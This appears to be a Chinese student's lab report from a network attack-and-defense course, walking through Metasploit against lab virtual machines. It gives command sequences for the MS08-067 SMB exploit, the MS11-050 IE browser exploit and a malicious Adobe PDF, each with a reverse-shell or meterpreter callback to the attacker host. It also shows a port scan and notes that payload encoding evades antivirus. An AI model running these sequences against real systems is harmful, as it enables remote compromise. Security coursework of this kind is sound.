2018-2019-2 20165329《網絡攻防技術》Exp5 MSF基礎應用
2018-2019-2 20165329《網絡攻防技術》Exp5 MSF基礎應用
一、實驗
一個主動攻擊實踐,ms08_067 ;
一個針對瀏覽器的攻擊,MS11-050 ;
一個針對客戶端的攻擊,Adobe ;
成功應用任何一個輔助模塊。
二、攻擊實例
Exp5-1 實現ms08_067
-
1.Windows服務滲透攻擊——MS08-067安全漏洞
①攻擊機:kali ②靶機:windows XP SP3(English)
可以ping通。
在攻擊機kali輸入msfconsole進入控制臺,依次輸入以下指令:
-
msf >
search ms08-067
- msf >
use exploit/windows/smb/ms08_067_netapi
-
msf exploit(ms08_067_netapi)>
show payloads
//查看可以供我們使用的payload: - msf exploit(ms08_067_netapi)>
set payload generic/shell_reverse_tcp
//tcp反向回連 - msf exploit(ms08_067_netapi)>
set LHOST 192.168.72.131
攻擊者ip - msf exploit(ms08_067_netapi)>
set LPORT 5329
- msf exploit(ms08_067_netapi)>
set RHOST 192.168.72.135
//靶機ip -
msf exploit(ms08_067_netapi)>
set target 0
//自動選擇目標系統類型 - msf exploit(ms08_067_netapi) >
exploit
-
成功!攻擊結果如下:
Exp5-2 實現ms11_050
①攻擊機:kali ②靶機:WindowsXP Professional sp2/Windows7專業版 ③IE版本:7.0/8.0
在攻擊機kali輸入msfconsole
進入控制臺,依次輸入以下指令:
- msf >
use windows/browser/ms11_050_mshtml_cobjectelement
- msf exploit(ms11_050_cobjectelement) >
set payload windows/meterpreter/reverse_http
//http反向回連 - msf exploit(ms11_050_cobjectelement) >
set LHOST 192.168.72.131
//攻擊機ip - msf exploit(ms11_050_cobjectelement) >
set LPORT 5329
//攻擊端口固定 - msf exploit(ms11_050_cobjectelement) >
set URIPATH rhl29
//統一資源標識符路徑設置 - msf exploit(ms11_050_cobjectelement) >
exploit
-
成功得到Local ip:
-
用靶機訪問http://192.168.72.131:8080/rhl29 ,出現了彈窗警告:
-
嘗試修改一下ie瀏覽器的相關設置,降低其安全等級
-
第二次在IE中訪問以上網址還是失敗了...很難受...
Exp5-3 實現Adobe
①攻擊機:kali ②靶機:windowsXP Professional sp2 ③Adobe版本:9.3
在攻擊機kali輸入msfconsole進入控制臺,依次輸入以下指令:
- msf >
use windows/fileformat/adobe_cooltype_sing
- msf exploit(adobe_cooltype_sing) >
set payload
windows/meterpreter/reverse_tcp //tcp反向回連 - msf exploit(adobe_cooltype_sing) >
set LHOST 192.168.72.131
//攻擊機ip - msf exploit(adobe_cooltype_sing) >
set LPORT 5329
//攻擊端口 - msf exploit(adobe_cooltype_sing) >
set FILENAME 20165329.pdf
//設置生成pdf文件的名字 - msf exploit(adobe_cooltype_sing) >
exploit
//攻擊 -
成功生成pdf。
-
由於生成的文件是隱藏文件使用copy命令把其復制到別的目錄中去。
- 將pdf文件傳送或拷貝到靶機上後,在kali上輸入back退出當前模塊,進入監聽模塊,輸入以下命令:
msf > use exploit/multi/handler //進入監聽模塊
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp //tcp反向連接
msf exploit(handler) > set LHOST 192.168.72.131 //攻擊機ip
msf exploit(handler) > set LPORT 5329 //攻擊端口固定
msf exploit(handler) > exploit
- 再把靶機上打開pdf文件,回連成功。
Exp5-4 實現輔助模塊
一、掃描端口
- msf > use auxiliary/scanner/portscan/syn(使用portscan模塊)
- msf auxiliary(syn) > show options
- msf auxiliary(syn) > set RHOSTS 192.168.72.137(目標)
- msf auxiliary(syn) > set THREADS 50(線程)
- msf auxiliary(syn) > exploit
由於掃描時間比較長,提前終止了。
二、掃描靶機的TCP端口使用情況
-
輸入以下指令:
-
run開啟掃描,可以看到在winxp靶機上所有tcp端口的使用情況
三、實驗總結
本次實驗沒有什麽特別難的地方,主要在環境的配置上,自己配置了好久但還是不成功,最後拷了配置好的虛擬機。體會到了metasploit攻擊漏洞的專一性,對操作系統和軟件版本都有細致的要求。必須要在特定環境和特定觸發條件下才能成功。感受到了實踐和真實攻擊的差距。
2.離實戰還缺些什麽技術
感覺大部分是按照教程來做的,離實戰還很遙遠
3.用自己的話解釋什麽是exploit,payload,encode.exploit
攻擊者對靶機進行滲透攻擊的這一過程
payload
類似於之前實驗中的shellcode,是攻擊者進行攻擊的“武器”
encode編碼
改編代碼,防殺軟識別
2018-2019-2 20165329《網絡攻防技術》Exp5 MSF基礎應用